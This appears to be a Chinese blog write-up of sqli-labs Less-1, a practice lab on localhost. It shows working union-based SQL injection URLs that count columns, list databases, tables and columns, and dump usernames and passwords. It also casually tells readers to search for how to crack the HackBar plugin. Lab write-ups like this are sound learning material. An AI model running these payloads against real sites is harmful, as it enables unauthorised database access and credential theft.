sqli-labs>>Less-1

準備最近刷一下sqli-labs,也是一個邊學習邊實踐的過程,希望自己可以堅持下去吧。
在這裏先推薦一下用HackBar這個瀏覽器插件(FireFox/Chrome),怎麼破解百度一下就成,我也不多說了,下面步入正題:
在這裏插入圖片描述

  1. 我們先輸入http://localhost/sqli-labs-master/Less-1/?id=1測試一下,沒有問題
    在這裏插入圖片描述

  2. http://localhost/sqli-labs-master/Less-1/?id=1’ 在輸入id=1’測試就會發現報錯,說
    你的SQL衣語法有錯,我們就可以知道是存在漏洞的。在這裏插入圖片描述

  3. 下來查詢數據庫有多少列http://localhost/sqli-labs-master/Less-1/?id=1' order by 3,正常。
    在這裏插入圖片描述

  4. http://localhost/sqli-labs-master/Less-1/?id=1' order by 4報錯,我們便能知道總共3列.
    在這裏插入圖片描述

  5. 下來查看哪些數據可以回顯,我們下來選擇在3的位置顯示信息。
    在這裏插入圖片描述

  6. 查看所有的數據庫http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+(當前數據庫爲security)
    在這裏插入圖片描述

  7. 查看所有的表http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

    我們建議‘security’用十六進制表示,不存在引號問題。在這裏插入圖片描述

  8. 然後查看列的信息http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
    在這裏插入圖片描述

  9. 最後我們直接得到賬號和密碼信息http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username) ,group_concat(password ) from users --+
    在這裏插入圖片描述

至此,我們就算進行了一次成功的sql注入。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章